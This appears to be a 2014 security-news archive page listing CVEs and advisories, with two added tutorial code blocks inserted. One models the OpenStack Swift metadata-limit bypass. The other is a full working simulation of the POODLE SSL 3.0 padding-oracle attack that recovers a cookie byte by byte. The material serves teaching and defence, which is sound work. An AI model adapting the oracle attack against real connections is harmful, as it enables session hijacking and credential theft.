The Winstone servlet container in CloudBees Jenkins before 1.551 and LTS before 1.532.2 allows remote attackers to hijack sessions via unspecified vectors.
Monthly Archives: October 2014
CVE-2014-7960
OpenStack Object Storage (Swift) before 2.2.0 allows remote authenticated users to bypass the max_meta_count and other metadata constraints via multiple crafted requests which exceed the limit when combined.
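The bug class behind this entry is that each POST is validated on its own headers, so a client that stays under `max_meta_count` per request can still accumulate far more metadata than the cap once the requests are merged. The following is an added illustration, not Swift's code: a minimal container-metadata store with the per-request check beside a check on the merged result. The limits are Swift's documented defaults (`max_meta_count` 90, `max_meta_overall_size` 4096, name length 128, value length 256), the `X-Container-Meta-*` prefix is the real header prefix, and the merge semantics (new keys added, existing keys overwritten, empty value deletes) are an assumption made here for the example.

```python
# Added example, not OpenStack Swift code.  Models the CVE-2014-7960 bug class:
# per-request metadata limits that are never re-checked against what is stored.
from typing import Dict, List, Optional, Tuple

MAX_META_COUNT = 90            # Swift default max_meta_count
MAX_META_OVERALL_SIZE = 4096   # Swift default max_meta_overall_size (bytes)
MAX_META_NAME_LENGTH = 128
MAX_META_VALUE_LENGTH = 256
META_PREFIX = "x-container-meta-"


def parse_meta(headers: Dict[str, str]) -> Dict[str, str]:
    """Pull user metadata out of request headers; keys lower-cased, prefix stripped."""
    out = {}
    for key, value in headers.items():
        lkey = key.lower()
        if lkey.startswith(META_PREFIX):
            out[lkey[len(META_PREFIX):]] = value
    return out


def check_meta(meta: Dict[str, str]) -> Optional[str]:
    """Return an error message if meta breaks any constraint, else None."""
    if len(meta) > MAX_META_COUNT:
        return f"Too many metadata items; max is {MAX_META_COUNT}"
    total = 0
    for name, value in meta.items():
        if not name:
            return "Metadata name cannot be empty"
        if len(name) > MAX_META_NAME_LENGTH:
            return f"Metadata name too long: {META_PREFIX}{name}"
        if len(value) > MAX_META_VALUE_LENGTH:
            return f"Metadata value longer than {MAX_META_VALUE_LENGTH}: {META_PREFIX}{name}"
        total += len(name) + len(value)
    if total > MAX_META_OVERALL_SIZE:
        return f"Total metadata too large; max size is {MAX_META_OVERALL_SIZE}"
    return None


def merge_meta(existing: Dict[str, str], update: Dict[str, str]) -> Dict[str, str]:
    """Assumed POST semantics: add/overwrite keys, an empty value deletes the key."""
    merged = dict(existing)
    for name, value in update.items():
        if value == "":
            merged.pop(name, None)
        else:
            merged[name] = value
    return merged


class VulnerableContainer:
    """Validates only the headers of the current request."""
    def __init__(self) -> None:
        self.meta: Dict[str, str] = {}

    def post(self, headers: Dict[str, str]) -> Tuple[int, Optional[str]]:
        update = parse_meta(headers)
        err = check_meta(update)
        if err:
            return 400, err
        self.meta = merge_meta(self.meta, update)
        return 204, None


class FixedContainer(VulnerableContainer):
    """Also validates what the container would hold after the merge."""
    def post(self, headers: Dict[str, str]) -> Tuple[int, Optional[str]]:
        update = parse_meta(headers)
        err = check_meta(update) or check_meta(merge_meta(self.meta, update))
        if err:
            return 400, err
        self.meta = merge_meta(self.meta, update)
        return 204, None


def split_requests(total_items: int, per_request: int) -> List[Dict[str, str]]:
    """Constructed attacker input: total_items metadata headers spread over several POSTs."""
    return [
        {f"X-Container-Meta-K{i}": "v" for i in range(start, min(start + per_request, total_items))}
        for start in range(0, total_items, per_request)
    ]


def run(container: VulnerableContainer, requests: List[Dict[str, str]]) -> Tuple[List[int], int]:
    """Send each request in order; return the status codes and the final stored item count."""
    statuses = [container.post(req)[0] for req in requests]
    return statuses, len(container.meta)
```

Three POSTs of 60 headers each all pass the per-request check, so `VulnerableContainer` ends up holding 180 items, twice the cap; `FixedContainer` accepts the first and rejects the other two with 400 because the merged result would hold 120. Re-posting existing keys or deleting keys still passes the merged check, so the fix does not break normal updates.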
CVE-2014-8074
Buffer overflow in the SetLogFile method in Foxit.FoxitPDFSDKProCtrl.5 in Foxit PDF SDK ActiveX 2.3 through 5.0.1820 before 5.0.2.924 allows remote attackers to execute arbitrary code via a long string, related to global variables.
CVE-2014-8755
Panasonic Network Camera View 3 and 4 allows remote attackers to execute arbitrary code via a crafted page, which triggers an invalid pointer dereference, related to “the ability to nullify an arbitrary address in memory.”
CVE-2014-8756
The NcrCtl4.NcrNet.1 control in Panasonic Network Camera Recorder before 4.04R03 allows remote attackers to execute arbitrary code via a crafted GetVOLHeader method call, which writes null bytes to an arbitrary address.
Fonality Trixbox CE 2.8.0.4 Command Execution
Fonality Trixbox CE version 2.8.0.4 remote root command execution exploit.
Elastix 2.4.0 Stable XSS / CSRF / Command Execution
Elastix version 2.4.0 stable suffers from cross site request forgery, remote command execution, and cross site scripting vulnerabilities.
Apple Security Advisory 2014-10-16-6
Apple Security Advisory 2014-10-16-6 – iTunes 12.0.1 is now available and addresses 83 vulnerabilities.
Apple Security Advisory 2014-10-16-5
Apple Security Advisory 2014-10-16-5 – OS X Server 2.2.5 is now available and addresses the SSL 3.0 POODLE bug (CVE-2014-3566). There are known attacks on the confidentiality of SSL 3.0 when a cipher suite uses a block cipher in CBC mode. An attacker could force the use of SSL 3.0, even when the server would support a better TLS version, by blocking TLS 1.0 and higher connection attempts. This issue was addressed by disabling CBC cipher suites when TLS connection attempts fail.
Apple Security Advisory 2014-10-16-4
Apple Security Advisory 2014-10-16-4 – OS X Server 3.2.2 is now available and addresses the SSL 3.0 POODLE bug (CVE-2014-3566). There are known attacks on the confidentiality of SSL 3.0 when a cipher suite uses a block cipher in CBC mode. An attacker could force the use of SSL 3.0, even when the server would support a better TLS version, by blocking TLS 1.0 and higher connection attempts. This issue was addressed by disabling CBC cipher suites when TLS connection attempts fail.
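Both OS X Server advisories above describe the same weakness: once a connection has been forced down to SSL 3.0, a CBC cipher suite leaks plaintext because SSL 3.0 pads records with arbitrary bytes and checks only the final pad-length byte before verifying the MAC. The following is an added, self-contained model of that padding oracle and of the byte-at-a-time recovery it enables; it is not code from Apple or from the advisory authors. A toy 4-round Feistel cipher over SHA-256 stands in for AES so that only the standard library is needed (the attack depends on CBC, not on the block cipher), HMAC-SHA256 stands in for the SSL 3.0 MAC, the cookie value `SECRET` and the request layout are constructed for the example, and a fresh IV per record replaces SSL 3.0's IV chaining, which changes nothing for the attack.

```python
# Added example, not from the Apple advisory: SSL 3.0 CBC padding oracle (POODLE).
# Toy Feistel cipher instead of AES; HMAC-SHA256 instead of the SSL 3.0 MAC.
import hashlib
import hmac
import os

BLOCK, MAC_LEN = 16, 32
ENC_KEY, MAC_KEY = os.urandom(16), os.urandom(16)   # shared by "browser" and "server"
SECRET = b"s3ss10nC00k13"                           # constructed cookie value the attacker wants


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key: bytes, rnd: int, half: bytes) -> bytes:  # Feistel round function
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key: bytes, blk: bytes) -> bytes:
    l, r = blk[:8], blk[8:]
    for i in range(4):
        l, r = r, _xor(l, _f(key, i, r))
    return r + l          # final swap lets decryption reuse the same loop in reverse


def block_decrypt(key: bytes, blk: bytes) -> bytes:
    l, r = blk[:8], blk[8:]
    for i in reversed(range(4)):
        l, r = r, _xor(l, _f(key, i, r))
    return r + l


def cbc(key: bytes, iv: bytes, data: bytes, decrypt: bool = False) -> bytes:
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        c = data[i:i + BLOCK]
        if decrypt:
            out.append(_xor(block_decrypt(key, c), prev)); prev = c
        else:
            prev = block_encrypt(key, _xor(c, prev)); out.append(prev)
    return b"".join(out)


def seal_record(plaintext: bytes) -> bytes:
    """SSL 3.0 record: plaintext || MAC || pad bytes (arbitrary!) || pad-length byte."""
    body = plaintext + hmac.new(MAC_KEY, plaintext, hashlib.sha256).digest()
    n = BLOCK - len(body) % BLOCK                    # 1..16 bytes of padding incl. length byte
    body += os.urandom(n - 1) + bytes([n - 1])
    iv = os.urandom(BLOCK)
    return iv + cbc(ENC_KEY, iv, body)


def sslv3_server_accepts(record: bytes) -> bool:
    """The oracle: SSL 3.0 checks only the pad-length byte, never the pad contents, then the MAC."""
    pt = cbc(ENC_KEY, record[:BLOCK], record[BLOCK:], decrypt=True)
    padlen = pt[-1]
    if padlen >= BLOCK:
        return False
    pt = pt[:-(padlen + 1)]
    msg, mac = pt[:-MAC_LEN], pt[-MAC_LEN:]
    return hmac.compare_digest(mac, hmac.new(MAC_KEY, msg, hashlib.sha256).digest())


HEAD, MID, TAIL = b"GET /", b" HTTP/1.1\r\nCookie: sid=", b"\r\n\r\n"


def victim_request(path_len: int, body_len: int) -> bytes:
    """Browser under attacker script control: path/body lengths are chosen by the attacker,
    the cookie is appended by the browser, and the record is sent over the downgraded link."""
    return seal_record(HEAD + b"A" * path_len + MID + SECRET + TAIL + b"B" * body_len)


def poodle_recover_byte(j: int, max_tries: int = 100_000) -> int:
    # Align SECRET[j] to the last byte of some block and make the final block pure padding.
    path_len = (BLOCK - 1 - (len(HEAD) + len(MID) + j)) % BLOCK
    pos = len(HEAD) + path_len + len(MID) + j
    body_len = (-(pos - j + len(SECRET) + len(TAIL) + MAC_LEN)) % BLOCK
    t = pos // BLOCK + 1                             # target block index, counting the IV as block 0
    for _ in range(max_tries):
        rec = victim_request(path_len, body_len)
        blocks = [rec[i:i + BLOCK] for i in range(0, len(rec), BLOCK)]
        forged = b"".join(blocks[:-1]) + blocks[t]   # replace the padding block with the target block
        if sslv3_server_accepts(forged):             # accepted iff the decrypted last byte equals 15
            return (BLOCK - 1) ^ blocks[t - 1][-1] ^ blocks[-2][-1]
    raise RuntimeError("oracle never accepted; check alignment")


def poodle_recover_secret() -> bytes:
    return bytes(poodle_recover_byte(j) for j in range(len(SECRET)))


if __name__ == "__main__":
    print(poodle_recover_secret())
```

Each byte costs about 256 oracle queries: the swapped-in target block decrypts to `P_t XOR C_(t-1) XOR C_(n-1)`, the server strips a whole block only when that last byte is 15, and the attacker then solves for `P_t[15]`. Because the oracle is a property of the SSL 3.0 record format itself, the only fixes are the ones the advisories take, refusing CBC suites (or SSL 3.0 entirely) on the fallback path, plus preventing the downgrade in the first place with TLS_FALLBACK_SCSV (RFC 7507).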